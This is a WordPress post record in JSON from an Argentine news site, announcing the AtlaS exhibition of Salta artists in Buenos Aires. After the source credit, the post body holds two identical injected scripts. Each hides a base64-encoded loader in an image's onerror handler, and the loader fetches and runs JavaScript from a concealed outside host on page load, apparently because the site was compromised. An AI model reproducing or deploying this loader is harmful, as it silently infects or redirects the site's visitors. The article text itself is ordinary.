{"id":4072,"date":"2024-06-04T10:18:44","date_gmt":"2024-06-04T13:18:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4072"},"modified":"2025-08-13T23:55:07","modified_gmt":"2025-08-14T02:55:07","slug":"el-proyecto-atlas-se-presenta-en-la-casa-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4072","title":{"rendered":"El proyecto Atlas se presenta en la Casa de Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4e3166aeaa633a578add46f292869e36\" style=\"background-color:#97024f\"><em>El proyecto AtlaS, que re\u00fane obras de diecisiete artistas visuales de la provincia de Salta, ser\u00e1 presentado en la Casa de Salta en Buenos Aires, con el apoyo de la Secretar\u00eda de Cultura de la Provincia.<\/em><\/h4>\n\n\n\n<p>AtlaS es una iniciativa de Galer\u00eda Eventual, con el acompa\u00f1amiento de la Secretar\u00eda de Cultura de Salta, que busca aumentar la visibilidad del trabajo de los artistas salte\u00f1os m\u00e1s all\u00e1 de los l\u00edmites provinciales. Esta experiencia de viaje es una instancia fundamental en la formaci\u00f3n art\u00edstica, por lo que uno de los objetivos de la galer\u00eda es crear nuevos escenarios de acci\u00f3n tanto a nivel nacional como internacional, La inauguraci\u00f3n de la muestra tendr\u00e1 lugar el 6 de junio a las 18 hs en Roque S\u00e1enz Pe\u00f1a 933, CABA.<\/p>\n\n\n\n<p>En esta primera instancia, se presentar\u00e1 una muestra de diecisiete artistas en la Casa de Salta de Buenos Aires. Los artistas seleccionados son: Calu Booth, Tatiana Papi, Fernando Belton, Sergio D\u00edaz, Abel Cruz, Doll Quin, Jorge Gonz\u00e1lez, Pini Day, Tom\u00e1s Mencacci, Caroline de Chaunac, Heber Artaza, Esteban Quiroga, Mili D&#8217;Aiello, Javier Torres, Mauri Molina, Rochi Ortiz y Pablo Manr\u00edquez. La curadur\u00eda est\u00e1 a cargo de Hern\u00e1n Ulm y Roly Arias.<\/p>\n\n\n\n<p>El nombre AtlaS alude tanto al top\u00f3nimo de la provincia de Salta como a los trabajos del te\u00f3rico alem\u00e1n Aby Warburg. Para Warburg, frente a la Historia del Arte que construye un relato lineal y progresivo en que las obras se explican seg\u00fan un principio cronol\u00f3gico y que las considera como expresiones de un estilo \u00fanico de una \u00e9poca, es necesario construir una Memoria de im\u00e1genes. Esta memoria, que Warburg llam\u00f3 Atlas, sostiene el peso del mundo en sus espaldas y expresa las fuerzas energ\u00e9ticas que construyen el espacio conflictivo de la cultura y del presente. Esta memoria es discontinua y toma en consideraci\u00f3n no las nociones de gusto, sino las fuerzas que se hacen presentes en las im\u00e1genes.<\/p>\n\n\n\n<p>En este sentido, la muestra re\u00fane un conjunto de im\u00e1genes que construyen la di\u00e1spora que configura el mapa del presente, recorriendo las divergencias y reelaboraciones del pasado en las que ellas se sit\u00faan.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-proyecto-atlas-se-presenta-en-la-casa-de-salta-95995\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El proyecto AtlaS, que re\u00fane obras de diecisiete artistas visuales de la provincia de Salta, ser\u00e1 presentado en la Casa de Salta en Buenos Aires, con el apoyo de la Secretar\u00eda de Cultura de la Provincia. AtlaS es una iniciativa de Galer\u00eda Eventual, con el acompa\u00f1amiento de la Secretar\u00eda de Cultura de Salta, que busca [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4073,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4072","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4072"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4072"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4072\/revisions"}],"predecessor-version":[{"id":6774,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4072\/revisions\/6774"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4073"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4072"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4072"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4072"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}